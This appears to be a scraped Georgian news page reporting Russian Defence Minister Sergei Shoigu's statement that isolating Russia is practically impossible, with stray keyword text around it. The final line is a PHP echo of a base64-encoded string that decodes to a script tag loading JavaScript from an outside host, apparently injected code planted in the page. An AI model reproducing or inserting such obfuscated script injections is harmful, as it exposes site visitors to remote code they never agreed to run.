celsiusi
ავერსი საქკაბელი
რუსეთის იზოლაციის მცდელობა ფაქტობრივად შეუძლებელია, – ეს რუსეთის თავდაცვის მინისტრის, სერგეი შოიგუს განცხადებაა, რომელსაც რუსეთის სახელისუფლებო მედია ავრცელებს.
 
„რუსეთის იზოლაციის შესახებ მუდმივი ხმამაღალი განცხადებები იმას მოწმობს, რომ ეს სიმართლისგან ძალიან შორსაა. ამის მიღწევა ზოგადად რთულია, მაგრამ ჩვენი ქვეყნის შემთხვევაში ფაქტობრივად შეუძლებელი, რადგან მსხვილი ბირთვული სახელმწიფოა თავისი ფართობითა და ტერიტორიით. ეს არის ქვეყანა მოწინავე მეცნიერებით, კარგად განვითარებული მრეწველობით, თავდაცვითი კომპლექსებით“, – ამბობს შოიგუ.
 
რუსეთის თავდაცვის მინისტრის თქმით, „ბევრს იმედი ჰქონდა, რომ ე.წ. სპეციალური ოპერაცია რაიმე სახით იმოქმედებს საწარმოების რაოდენობაზე, კომპანიებზე, რომლებიც მონაწილეობენ ფორუმში „არმია 2022“.
 
„გეტყვით, რომ მეგობრები დარჩნენ მეგობრებად. მათზე ყველა მხრიდან განხორციელებულმა უძლიერესმა ზეწოლამ ვერ იმოქმედა“, – განაცხადა შოიგუმ.
445
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");